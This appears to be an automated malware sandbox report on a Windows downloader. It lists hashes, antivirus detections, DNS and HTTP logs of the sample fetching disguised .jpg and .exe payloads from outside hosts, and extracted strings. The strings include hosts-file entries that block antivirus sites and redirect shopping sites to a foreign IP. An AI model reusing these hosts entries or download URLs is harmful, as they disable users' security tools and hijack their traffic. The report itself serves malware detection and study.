Analysis Date2014-10-11 02:46:06
MD5f692cc469e8f17291e3dc9bae81000e4
SHA159002a3af6fbb09fe3a5f8b454a6de1844803a4e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6d73eda50f2907d676e2b3a146642493 sha1: 80ea83bad5204c9395ddc856c26e961da18c3fb3 size: 245760
Section.rdata md5: 0033ebc7900d095a70fe324f30ca6987 sha1: d9f3a94f29d70871b16c84177a6127f855116dad size: 24576
Section.data md5: a138b332ed4aa4f3036ef65d121e08ec sha1: d26c26d97ac34614e741a948dbd55dac03f74fe3 size: 139264
Timestamp2014-07-18 02:35:16
PackerMicrosoft Visual C++ v6.0
PEhashaf17679c061913f5b5151d5c0b003d35c9c8b00a
IMPhash8e7ed8998c4ba12d48862957c636ab2a
AV360 SafeGen:Variant.Symmi.44965
AVAd-AwareGen:Variant.Symmi.44965
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.COJX-6960
AVAvira (antivir)TR/Symmi.44965.15
AVBullGuardGen:Variant.Symmi.44965
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Symmi.44965
AVEset (nod32)Win32/Agent.WCF
AVFortinetW32/Generic.WCF!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Symmi.44965
AVGrisoft (avg)Agent4.CCQD
AVIkarusTrojan.Win32.Agent
AVK7no_virus
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.dx!dfz
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.44965
AVNormanwin32/SB/Malware
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\WINDOWS\system32\drivers\etc\hosts

Network Details:

DNSwww.12000.com.cn
Type: A
118.193.155.117
DNSimg.freep.cn
Type: A
221.234.36.242
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSd3.freep.cn
Type: A
DNSd2.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
HTTP GEThttp://www.12000.com.cn/acbbb.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.12000.com.cn/-8434_48740_mny.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_14071723055648l3535559.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.12000.com.cn/guanshu.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140717232426px20535559.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140717230328kox0535559.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.12000.com.cn/td.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_1407172315202xdu535559.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140718102418ibmr535559.jpg
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140717233351d31e535559.jpg
User-Agent: DownJet1.0
Flows TCP192.168.1.1:1031 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1032 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1033 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1034 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1035 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1036 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1037 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1038 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1039 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1040 ➝ 61.160.245.14:80
Flows TCP192.168.1.1:1041 ➝ 61.160.245.14:80
Flows TCP192.168.1.1:1042 ➝ 221.234.42.184:80

Raw Pcap
0x00000000 (00000)   47455420 2f616362 62622e6a 70672048   GET /acbbb.jpg H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a20446f 776e4a65 74312e30 0d0a486f   : DownJet1.0..Ho
0x00000040 (00064)   73743a20 7777772e 31323030 302e636f   st: www.12000.co
0x00000050 (00080)   6d2e636e 0d0a436f 6e6e6563 74696f6e   m.cn..Connection
0x00000060 (00096)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f2d3834 33345f34 38373430   GET /-8434_48740
0x00000010 (00016)   5f6d6e79 2e6a7067 20485454 502f312e   _mny.jpg HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   55736572 2d416765 6e743a20 446f776e   User-Agent: Down
0x00000040 (00064)   4a657431 2e300d0a 486f7374 3a207777   Jet1.0..Host: ww
0x00000050 (00080)   772e3132 3030302e 636f6d2e 636e0d0a   w.12000.com.cn..
0x00000060 (00096)   436f6e6e 65637469 6f6e3a20 436c6f73   Connection: Clos
0x00000070 (00112)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000080 (00128)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 37313732   GET /3tb_1407172
0x00000010 (00016)   33303535 3634386c 33353335 3535392e   3055648l3535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f677561 6e736875 2e6a7067   GET /guanshu.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 446f776e 4a657431 2e300d0a   nt: DownJet1.0..
0x00000040 (00064)   486f7374 3a207777 772e3132 3030302e   Host: www.12000.
0x00000050 (00080)   636f6d2e 636e0d0a 436f6e6e 65637469   com.cn..Connecti
0x00000060 (00096)   6f6e3a20 436c6f73 650d0a43 61636865   on: Close..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a3a20 6e6f2d63 61636865   he....: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 37313732   GET /3tb_1407172
0x00000010 (00016)   33323432 36707832 30353335 3535392e   32426px20535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 37313732   GET /3tb_1407172
0x00000010 (00016)   33303332 386b6f78 30353335 3535392e   30328kox0535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f74642e 6a706720 48545450   GET /td.jpg HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000020 (00032)   2a0d0a55 7365722d 4167656e 743a2044   *..User-Agent: D
0x00000030 (00048)   6f776e4a 6574312e 300d0a48 6f73743a   ownJet1.0..Host:
0x00000040 (00064)   20777777 2e313230 30302e63 6f6d2e63    www.12000.com.c
0x00000050 (00080)   6e0d0a43 6f6e6e65 6374696f 6e3a2043   n..Connection: C
0x00000060 (00096)   6c6f7365 0d0a4361 6368652d 436f6e74   lose..Cache-Cont
0x00000070 (00112)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000080 (00128)   0a6e7472 6f6c3a20 6e6f2d63 61636865   .ntrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 37313732   GET /3tb_1407172
0x00000010 (00016)   33313532 30327864 75353335 3535392e   315202xdu535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 37313831   GET /3tb_1407181
0x00000010 (00016)   30323431 3869626d 72353335 3535392e   02418ibmr535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 37313732   GET /3tb_1407172
0x00000010 (00016)   33333335 31643331 65353335 3535392e   33351d31e535559.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
\
 (<.\
.-E-0-000-+ 
00...........?-  
0
0 
0
.*r.CLlE
CC
.
 
u
Cjjj
Djjj
         (((((                  H
(null)
^,_^][
                          
\....\
00:00:00
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0@BaiduSdTray.exe
0SSSSS
0WWWWW
126126126126
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
  1jinsan 
1#QNAN
1#SNAN
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
 22wpszhen
 2345zhen
262122262122268DD8900FB2122262122
   2Bguangshushurufazhen
%2\CLSID
%2\DocObject
%2\Insertable
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
   360
   360sd
   360SE
3F3F6767673E2121247C71683E737F7D3F68797E233F7D71797C3E7163602F61617E657D7275622D8DD8900FB786464602A
.4.7.lnk
4~f9.u
\$4UVW
_7654_356.exe
_7654_5943.exe
_7654_5943.jpg
^}%95`
%9, %8
9t$dt7
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abnormal program termination
 acbbb
AC:\bdkv_install.log
Accept: */*
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
An application has made an attempt to load the C runtime library incorrectly.
AppendMenuA
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXC:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
AtlAxWinInit
atl.dll
ATL.DLL
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
bad allocation
bad exception
BaiduAnTray.exe
  baiduSD
   BAOFENG
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
BeginPaint
BitBlt
blackmoon
BlackMoon RunTime Error:
BlueBox
BlueSoftSetup_bsugqr.exe
CallNextHookEx
CallWindowProcA
C:\BlueSoftSetup.log
CCmdTarget
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Desktop\
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
CGdiObject
CheckedValue
CheckMenuItem
CheckMenuRadioItem
Chrome=1
 Class Hierarchy Descriptor'
ClientToScreen
CloseHandle
ClosePrinter
__clrcall
     cls
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
cmd.exe
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COleBusyDialog
COleDialog
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
 Complete Object Locator'
ComSpec
[Config]
Connection: close
CONOUT$
`copy constructor closure'
CopyRect
CoRegisterMessageFilter
CoRevokeClassObject
CorExitProcess
CoUninitialize
C:\Program Files\2345Explorer
C:\Program Files\2345Explorer\Uninstall.exe
C:\Program Files\2345Pic
C:\Program Files\2345Pic\Uninstall.exe
C:\Program Files\91yGame\unins000.exe
C:\Program Files\ADSafe3\ADSafe.exe
C:\Program Files\ADSafe3\uninst.exe
C:\Program Files\ainqngz3.9\uninstall.exe
C:\Program Files\ainqngz4.7\uninstall.exe
C:\Program Files\baidu\BaiduBrowser\baidubrowser.exe
C:\Program Files\Baofeng\StormPlayer\Uninst.exe
C:\Program Files\BlueBox
C:\Program Files\BlueBox\uninst.exe
C:\Program Files\Common Files
C:\Program Files\Common Files\
